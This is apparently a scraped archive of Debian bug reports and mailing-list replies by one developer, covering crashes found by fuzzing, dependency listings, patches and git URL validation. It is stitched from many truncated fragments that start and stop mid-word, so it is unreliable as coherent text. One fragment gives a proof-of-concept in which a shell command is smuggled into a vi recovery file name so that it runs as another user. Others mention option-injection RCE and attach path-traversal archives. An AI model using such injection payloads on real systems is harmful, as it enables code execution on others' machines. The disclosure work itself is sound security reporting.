cture: i386
Versions of packages cppcheck depends on:
ii libc6 2.27-3
ii libgcc1 1:8.1.0-1
ii libpcre3 2:8.39-9
ii libstdc++6 8.1.0-1
ii libtinyxml2-6 6.2.0+dfsg-1
ii python3 3.6.5-3
ii python3-pygments 2.2.0+dfsg-1
--
Jakub Wilk
Easy work-around for pdf2djvu: add the "fontconfig" package to
Build-Depends. It will take care of creating the UUID file for
/usr/local/share/fonts/, and then FcDirCacheCreateUUID() will be mostly
no-op.
--
Jakub Wilk
the build-dependencies.)
--
Jakub Wilk
same way for ld?
Yes.
* Do cross toolchains also need such a symlink?
No. (Although I suppose it wouldn't hurt either.)
* If yes, where to place it? (They use a different directory layout.)
* Which make variable contains the correct path?
$(gcc_lib_dir) would be my guess.
--
Jakub Wilk
via /run/systemd/system)
Versions of packages gcc-7 depends on:
ii binutils 2.30-15
ii cpp-7 7.3.0-16
ii gcc-7-base 7.3.0-16
ii libc6 2.27-3
ii libcc1-0 8-20180414-1
ii libgcc-7-dev 7.3.0-16
ii libgcc1 1:8-20180414-1
ii libgmp10 2:6.1.2+dfsg-3
ii libisl19 0.19-1
ii libmpc3 1.1.0-1
ii libmpfr6 4.0.1-1
ii libstdc++6 8-20180414-1
ii zlib1g 1:1.2.8.dfsg-5
Versions of packages gcc-7 recommends:
ii libc6-dev 2.27-3
--
Jakub Wilk
arning: EOF while reading header (continuing anyway)
- PDF syntax warning: EOF while reading header (continuing anyway)
Ideally, this should be fixed in Poppler by cherry-picking this patch:
https://cgit.freedesktop.org/poppler/poppler/patch/?id=e491e935ea355d48519cf0a14e4b060655850675
--
Jakub Wilk
/tmp/moo
/tmp/moo
--
Jakub Wilk
Control: forwarded -1 https://github.com/jwilk/ocrodjvu/issues/22
Control: close -1
This bug was filed in Debian BTS, because there was no upstream bug
tracker at the time. Let's close this bug in favor of the upstream one.
--
Jakub Wilk
* Adrian Bunk <b...@debian.org>, 2018-03-05, 18:50:
pdf-unicode.cc:29:10: fatal error: UTF8.h: No such file or directory
This was fixed upstream in 0.9.8:
https://github.com/jwilk/pdf2djvu/commit/e263c43bbd552a771f74f0f93ce9cca8b1aa8702
--
Jakub Wilk
if (int($major) >= 2 && int($minor) >= 12) {
">=" compares numerically even when arguments are strings, so the int()
calls aren't needed here.
More importantly, this will break when Git 3.0 is released, because
int($minor) >= 12 will be no longer true.
--
Jakub Wilk
Connecting to git.openstack.org (git.openstack.org)|104.130.246.85|:80...
connected.
HTTP request sent, awaiting response... 404 Not found
2018-02-24 14:16:48 ERROR 404: Not found.
--
Jakub Wilk
I suggest replacing
(?:[^:]|$)
with
(?!:|//)
qw(git clone -c protocol.file.allow=user --)
qw(git -c protocol.file.allow=user clone --) would be better here.
The difference is that the former unnecessarily puts
protocol.file.allow=user in the repo's .git/config.
--
Jakub Wilk
f packages urlwatch depends on:
ii python3-appdirs 1.4.3-1
ii python3-keyring 10.6.0-1
ii python3-minidb 2.0.2-1
ii python3-pycodestyle 2.3.1-2
ii python3-requests 2.18.4-2
ii python3-yaml 3.12-1+b1
ii python3 3.6.4-1
--
Jakub Wilk
$git_url !~ /^(?:https?|git|ssh|file):[^:]/)
{
SSH protocol has an alternative (and I guess more popular) scp-like
syntax:
[user@]example.org:path/to/repo
There are also two syntaxes for local repositories, although I think
neither should be allowed. It's *web*checkout after all...
--
Jakub Wilk
56694fa4, leave_original=true) at util.c:407
#123290 0x565e17da in output_file_now (from=,
from_needs_removal=0xffb1c3f3, from_st=, to=0x0, mode=32768,
backup=true) at patch.c:1869
#123291 0x565e18c1 in output_files (st=0x0) at patch.c:1949
#123292 0x565dfe9c in main (argc=, argv=) at
patch.c:683
-- System Information:
Architecture: i386
Versions of packages patch depends on:
ii libc6 2.26-6
--
Jakub Wilk
diff --git a/x b/x
--- a/x
+++ b/x
@@ -1 +1 @@
-a
+b
k to the
canonical document about option injection but I cannot find a link.
IIRC it includes how to get RCE with tar/cpio/etc option injection. Do
you remember where that can be found?
I haven't heard about it.
--
Jakub Wilk
Package: qa.debian.org
User: qa.debian@packages.debian.org
Usertags: pts
On <https://packages.qa.debian.org/d/dash.html>, "browse source code"
points to <https://sources.debian.org/src/dash/unstable/>, which is 404.
--
Jakub Wilk
nd
a way to exploit it for anything nefarious.
--
Jakub Wilk
loited via git-remote-ext:
https://github.com/sociomantic-tsunami/git-hub/issues/197
https://github.com/seveas/git-spindle/issues/154
--
Jakub Wilk
Source: gzip
Version: 1.6-5
Severity: wishlist
Please add
Homepage: https://www.gnu.org/software/gzip/
to debian/control.
--
Jakub Wilk
Control: notfound -1 1:1.7.1-2
Control: found -1 1:1.7.1-1
Bad submitter.
--
Jakub Wilk
Control: forwarded -1
https://lists.gnu.org/archive/html/bug-tar/2016-09/msg5.html
Tags: -1 + fixed-upstream
http://git.savannah.gnu.org/cgit/tar.git/commit/?id=c2886473a803 (which
is included in tar 1.30) fixes it for me.
--
Jakub Wilk
Source: libxss
Version: 1:1.2.2-2
Tags: patch
$ apt-cache show libxss1 | grep git:// | xargs git ls-remote
fatal: repository 'https://anongit.freedesktop.org/git/xorg/lib/libScrnSaver/'
not found
--
Jakub Wilk
From bb62d415b80f8eeeae5c1163ab2801dfba475c97 Mon Sep 17 00:00:00 2001
From: Jakub
Source: xorg-docs
Version: 1:1.7.1-2
Tags: patch
--
Jakub Wilk
From ad5c7b737e4ed890f727a1c4c08c2eb800e2701a Mon Sep 17 00:00:00 2001
From: Jakub Wilk <jw...@jwilk.net>
Date: Thu, 25 Jan 2018 22:02:54 +0100
Subject: [PATCH] Fix debian/watch.
---
debian/watch | 2 +-
1 file changed, 1 ins
r example, if this sentence were embedded in a
binary, Lintain would find the misspelling: even though the misspelled
word is short, it's part of a longer chunk of text, which would be
spell-checked.
--
Jakub Wilk
s ext3.
The --sort option was added upstream in 1.28, so I guess this should be
closed.
--
Jakub Wilk
rchive-dev to Suggest and the following text
(shamelessly stolen from #662718) to the package description:
The man page describing the tar(5) archive format can be
found in the libarchive-dev package.
--
Jakub Wilk
Source: tar
Version: 1.29b-2
Severity: wishlist
Please add:
Homepage: https://www.gnu.org/software/tar/
to debian/control.
--
Jakub Wilk
1.6.6-1
ii sphinx-rtd-theme-common 0.2.4-1
--
Jakub Wilk
/etc/pulse/client.conf.d/00-disable-autospawn.conf
-- System Information:
Architecture: i386
Versions of packages apparmor depends on:
ii libc6 2.26-4
ii debconf 1.5.65
ii python3 3.6.4-1
ii lsb-base 9.20170808
--
Jakub Wilk
is caused by a bug in Pillow:
https://github.com/python-pillow/Pillow/issues/2926
--
Jakub Wilk
0055cad3f88a91 in main (argc=7, argv=0x7fff0e6cf958) at
./psi/dxmainc.c:86
-- System Information:
Architecture: amd64
Versions of packages ghostscript depends on:
ii libc6 2.26-4
ii libgs9 9.22~dfsg-1
ii debconf 1.5.65
--
Jakub Wilk
djvu.ps
Description: PostScript document
-distro-info 0.17
ii python2.7 2.7.14-4
ii python 2.7.14-4
--
Jakub Wilk
* Clint Adams <sch...@debian.org>, 2006-11-08, 18:06:
you could lobby to get 'type' or your favorite option added explicitly
to debian policy.
The relevant Policy bug is #747320.
--
Jakub Wilk
+xsa245-0+deb9u1
ii libxenstore3.0 4.8.2+xsa245-0+deb9u1
ii zlib1g 1:1.2.8.dfsg-5
ii qemu-system-common 1:2.10.0+dfsg-2
ii seabios 1.10.2-1
ii ipxe-qemu 1.0.0+git-20161027.b991c67-1
--
Jakub Wilk
I've retired from sponsoring. Sorry!
--
Jakub Wilk
* Jakub Wilk <jw...@jwilk.net>, 2018-01-04, 21:01:
$ export TAR_OPTIONS='--owner root --group root --mode go-r'
$ tar -cvvf foo.tar /dev/null
tar: Removing leading `/' from member names
crw--w--w- `/dev/null 1,3 2018-01-04 18:42 /dev/null
Valgrind suggests it's a use-after-free:
I
depends on:
ii libacl1 2.2.52-3+b1
ii libc6 2.26-1
ii libselinux1 2.7-2
--
Jakub Wilk
-perl 0.27-1
ii librole-rest-client-perl 0.22-1
ii libstrictures-perl 2.03-1
ii libtry-tiny-perl 0.30-1
ii libtype-tiny-perl 1.002001-1
ii liburi-perl 1.72-2
ii libyaml-perl 1.24-1
--
Jakub Wilk
-langs > /dev/null
real 0m0.367s
user 0m0.333s
sys 0m0.032s
--
Jakub Wilk
Package: ocaml-doc
Version: 4.05-1~exp1
OCaml 4.05 is now in unstable, so documentation for this version should
be uploaded to unstable, too.
--
Jakub Wilk
libc6-dev 2.25-5
--
Jakub Wilk
2:3.3.12-3
ii python3 3.6.3-2
ii sensible-utils 0.0.11
ii whiptail 0.52.20-1+b1
ii dialog 1.3-20160828-2
un zenity
--
Jakub Wilk
diff --git a/which-pkg-broke b/which-pkg-broke
ind
0.52.20-1+b1
ii dialog 1.3-20160828-2
un zenity
--
Jakub Wilk
diff --git a/which-pkg-broke b/which-pkg-broke
index 4f53139..c0bd621 100755
--- a/which-pkg-broke
+++ b/which-pkg-broke
@@ -9,12 +9,15 @@ import time
from string import *
from stat import *
riate ioctl for device" doesn't make sense.
--
Jakub Wilk
-quiet --retry=TERM/30/KILL/5 --pidfile $PIDFILE
--name $NAME
But consolation doesn't create any pidfile, so I can't see how could it
work.
--
Jakub Wilk
gssapi-krb5-2 1.15.2-2
ii libidn11 1.33-2
ii libk5crypto3 1.15.2-2
ii libkrb5-3 1.15.2-2
ii libncursesw5 6.0+20171125-1
ii libsasl2-2 2.1.27~101-g0780600+dfsg-3
ii libtinfo5 6.0+20171125-1
ii libtokyocabinet9 1.4.48-11+b1
--
Jakub Wilk
real 0m0.012s
user 0m0.007s
sys 0m0.005s
--
Jakub Wilk
of packages consolation depends on:
ii libc6 2.25-2
ii libevdev2 1.5.7+dfsg-1
ii libinput10 1.9.2-1
ii libudev1 235-3
ii lsb-base 9.20170808
--
Jakub Wilk
1.11.0-1
ii python3 3.6.3-2
--
Jakub Wilk
Package: mutt
Version: 1.9.1-2
The package description says "This package is built with the NeoMutt
patchset", but this is no longer the case.
--
Jakub Wilk
=500 ouid=0
-- System Information:
Architecture: i386
Versions of packages man-db depends on:
ii dpkg 1.19.0.4
ii groff-base 1.22.3-9
ii bsdmainutils 9.0.14
ii debconf 1.5.65
ii libc6 2.25-1
ii libgdbm3 1.8.3-14
ii libpipeline1 1.5.0-1
ii zlib1g 1:1.2.8.dfsg-5
Versions of packages man-db suggests:
ii groff 1.22.3-9
ii less 481-2.1
ii apparmor 2.11.1-3
--
Jakub Wilk
esw5 6.0+20170902-1
ii libpcre3 2:8.39-5
--
Jakub Wilk
nullptr.sh
Description: Bourne shell script
busybox depends on:
ii libc6 2.25-1
--
Jakub Wilk
A38: run_applet_and_exit (appletlib.c:927)
==2180==by 0x10FADC: main (appletlib.c:1032)
...
Found using American Fuzzy Lop:
http://lcamtuf.coredump.cx/afl/
-- System Information:
Architecture: i386
Versions of packages busybox depends on:
ii libc6 2.25-1
--
Jakub Wilk
oob
ii libicu57 57.1-8
ii libobjc4 7.2.0-16
ii libstdc++6 7.2.0-16
ii libwavpack1 5.1.0-2
ii zlib1g 1:1.2.8.dfsg-5
--
Jakub Wilk
overflow.lha
Description: application/lha
nd I confirm that it fixes the crash.
--
Jakub Wilk
0x5663fa47 in main (argc=4, argv=0xff8ada24) at fig2dev.c:412
-- System Information:
Architecture: i386
Versions of packages fig2dev depends on:
ii gawk 1:4.1.4+dfsg-1
ii x11-common 1:7.7+19
ii libc6 2.24-17
ii libpng16-16 1.6.34-1
ii libxpm4 1:3.5.12-1
--
Jakub Wilk
;
If the string length is 0 (or 1 in some cases), this writes outside the
buffer.
--
Jakub Wilk
Information:
Architecture: i386
Versions of packages gcab depends on:
ii libc6 2.24-17
ii libgcab-1.0-0 0.7-4
ii libglib2.0-0 2.54.2-1
--
Jakub Wilk
oob.cab.gz
Description: application/gzip
on:
ii gawk 1:4.1.4+dfsg-1
ii x11-common 1:7.7+19
ii libc6 2.24-17
ii libpng16-16 1.6.34-1
ii libxpm4 1:3.5.12-1
--
Jakub Wilk
overflow.fig
Description: application/xfig
386
Versions of packages nomarch depends on:
ii libc6 2.24-17
--
Jakub Wilk
by CU at offset 0x66a8 [in module
/usr/lib/debug/.build-id/78/69c51149fd48e2dab7696d4ffc419fd0df1795.debug]
are you experimenting the same issue with build in unstable ?
Yes.
--
Jakub Wilk
(0xbe70f1b6b2031b76)
referenced by CU at offset 0x6738 [in module
/usr/lib/debug/.build-id/78/69c51149fd48e2dab7696d4ffc419fd0df1795.debug]
-- System Information:
Architecture: i386
Versions of packages clang-5.0-dbgsym depends on:
ii clang-5.0 1:5.0~+rc2-1
--
Jakub Wilk
ary code as user "nobody".
PoC exploit:
$ echo 'X-vi-recover-path: /etc/fstab' >
'/var/tmp/vi.recover/recover.moo;z=$(pwd|head${IFS}-c1);apt-get${IFS}moo>${z}tmp${z}pwned'
--
Jakub Wilk
5.1.0-2
ii zlib1g 1:1.2.8.dfsg-5
--
Jakub Wilk
bigvla.ar
Description: Binary data
57.1-8
ii libobjc4 7.2.0-12
ii libxml2 2.9.4+dfsg1-5
ii libxslt1.1 1.1.29-2.2
ii zlib1g 1:1.2.8.dfsg-5
Versions of packages libgnustep-base1.25 recommends:
ii gnustep-base-runtime 1.25.0-2
--
Jakub Wilk
#include
#import
#import
int main()
libjs-underscore 1.8.3~dfsg-1
ii libjs-sphinxdoc 1.6.5-2
--
Jakub Wilk
perl-debug depends on:
ii perl 5.26.1-2
ii libc6 2.24-17
--
Jakub Wilk
ader.pm line 128, line 1.
-- System Information:
Architecture: i386
Versions of packages perl depends on:
ii dpkg 1
Package: tracker.debian.org
The "testing migrations" box on https://tracker.debian.org/pkg/libkal
reads:
د اÙÙ
ØÙ
Ùد٠(Ahmed El-Mahmoudy)
--
Jakub Wilk
s of packages dpkg depends on:
ii libbz2-1.0 1.0.6-8.1
ii libc6 2.24-17
ii liblzma5 5.2.2-1.3
ii libselinux1 2.7-2
ii zlib1g 1:1.2.8.dfsg-5
ii tar 1.29b-2
--
Jakub Wilk
traversal.deb
Description: application/vnd.debian.binary-package
libcap2 1:2.25-1.1
ii libtinfo5 6.0+20170902-1
Versions of packages zsh recommends:
ii libncursesw5 6.0+20170902-1
ii libpcre3 2:8.39-5
--
Jakub Wilk
Package: clang
Version: 1:4.0-37~exp4
Severity: wishlist
Please ship /usr/bin/sancov -> /usr/bin/sancov-4.0 symlink.
-- System Information:
Architecture: i386
Versions of packages clang depends on:
ii clang-4.0 1:4.0.1-8
--
Jakub Wilk
2.24-17
ii libcap2 1:2.25-1.1
ii libtinfo5 6.0+20170902-1
Versions of packages zsh recommends:
ii libncursesw5 6.0+20170902-1
ii libpcre3 2:8.39-5
--
Jakub Wilk
uaf.sh
Description: Bourne shell script
3.6.3-1
ii python2.7.14-1
--
Jakub Wilk
.
But there's no such info page.
--
Jakub Wilk
n:
Architecture: i386
Versions of packages ksh depends on:
ii libc6 2.24-17
ii binfmt-support 2.1.8-1
--
Jakub Wilk
epends on:
ii e2fslibs 1.43.7-1
ii libblkid1 2.30.2-0.1
ii libc6 2.24-17
ii libcomerr2 1.43.7-1
ii libss2 1.43.7-1
ii libuuid1 2.30.2-0.1
--
Jakub Wilk
sigfpe.ext2.gz
Description: application/gzip
Source: llvm-toolchain-5.0
Version: 1:5.0~+rc2-1
I tried rebuilding this package with DEB_BUILD_OPTIONS=noopt, but it
didn't work: the code was still built with -O2.
--
Jakub Wilk
ormation:
Architecture: i386
Versions of packages ksh depends on:
ii libc6 2.24-17
ii binfmt-support 2.1.8-1
--
Jakub Wilk
i libc6 2.24-17
--
Jakub Wilk
ends on:
ii libc6 2.24-17
ii debianutils 4.8.2
ii dpkg 1.18.24
--
Jakub Wilk
Package: pax
Version: 1:20161104-2
The tar_rd() function does:
pt = &(arcn->name[arcn->nlen - 1]);
without checking that arcn->nlen is greater than 0.
-- System Information:
Architecture: i386
Versions of packages pax depends on:
ii libc6 2.24-17
--
Jakub Wilk
)
by 0x10D15E: list (ar_subs.c:104)
by 0x109DD6: main (pax.c:296)
Address 0xd81ec390 is not stack'd, malloc'd or (recently) free'd
-- System Information:
Architecture: i386
Versions of packages pax depends on:
ii libc6 2.24-17
--
Jakub Wilk
ing American Fuzzy Lop:
http://lcamtuf.coredump.cx/afl/
-- System Information:
Architecture: i386
Versions of packages pax depends on:
ii libc6 2.24-17
--
Jakub Wilk
zip
--
Jakub Wilk
traversal.tar.gz
Description: application/gzip
tem Information:
Architecture: i386
Versions of packages nomarch depends on:
ii libc6 2.24-17
--
Jakub Wilk
oob.arc
Description: Binary data
Adding forgotten attachment...
--
Jakub Wilk
#include <stdint.h>
#include <stdlib.h>
int main(int argc, char **argv)
{
    void *p;
    /* request a huge aligned allocation, just below SIZE_MAX */
    return posix_memalign(&p, 0x10, SIZE_MAX - 0x20);
}
6b in main ()
-- System Information:
Architecture: i386
Versions of packages libc6 depends on:
ii libgcc1 1:7.2.0-8
--
Jakub Wilk
ion:
Architecture: i386
Versions of packages e2fsprogs depends on:
ii e2fslibs 1.43.6-1
ii libblkid1 2.29.2-5+b1
ii libc6 2.24-17
ii libcomerr2 1.43.6-1
ii libss2 1.43.6-1
ii libuuid1 2.29.2-5+b1
--
Jakub Wilk
oob.ext2.gz
Description: application/gzip
vfs 1.34.1-1
ii libglib2.0-data 2.54.1-1
ii gsettings-desktop-schemas 3.24.1-1
Versions of packages nautilus recommends:
ii librsvg2-common 2.40.18-1
un gvfs-backends
un gnome-sushi
--
Jakub Wilk
traversal.tar.gz
Description: application/gzip
oredump.cx/afl/
-- System Information:
Architecture: i386
Versions of packages maildrop depends on:
ii courier-authlib 0.68.0-4
ii libc6 2.24-17
ii libcourier-unicode1 1.4-3+b1
ii libgcc1 1:7.2.0-8
ii libgdbm3 1.8.3-14
ii libpcre3 2:8.39-5
ii libstdc++6 7.2.0-8
--
Jakub Wilk
0x0, mimesection=0x565749b8 "moo",
extract_filename=0x0, argc=0, argv=0xd584, extract_func=0x565587d0 ) at
reformime.c:656
#1 0x56556ee5 in main2 (argv=, argc=,
mimecharset=) at reformime.c:1181
#2 main (argc=, argv=) at reformime.c:1226
--
Jakub Wilk
f packages maildrop depends on:
ii courier-authlib 0.68.0-4
ii libc6 2.24-17
ii libcourier-unicode1 1.4-3+b1
ii libgcc1 1:7.2.0-7
ii libgdbm3 1.8.3-14
ii libpcre3 2:8.39-5
ii libstdc++6 7.2.0-7
--
Jakub Wilk
...
(Note the "-Wl,-s" option.)
--
Jakub Wilk
ii libharfbuzz0b 1.4.2-1
ii libjbig2dec0 0.13-5
ii libjpeg62-turbo 1:1.5.2-2
ii libopenjp2-7 2.2.0-1
ii zlib1g 1:1.2.8.dfsg-5
--
Jakub Wilk
crash.pdf.gz
Description: application/gzip
is not set.
-- System Information:
Architecture: i386
Versions of packages reposurgeon depends on:
ii libc6 2.24-17
ii libpython2.7 2.7.14-2
ii python3 3.5.3-3
ii python2.7.14-1
--
Jakub Wilk
0x5665fa20 in tmalloc .../procmail-3.22/src/ecommon.c:21
#2 0x56655b61 in getsender .../procmail-3.22/src/formail.c:222
#3 0x56658fce in main .../procmail-3.22/src/formail.c:628
#4 0xf6f17285 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18285)
...
--
Jakub Wilk
4.0-dev 1:4.0.1-3
ii python2.7.14-1
--
Jakub Wilk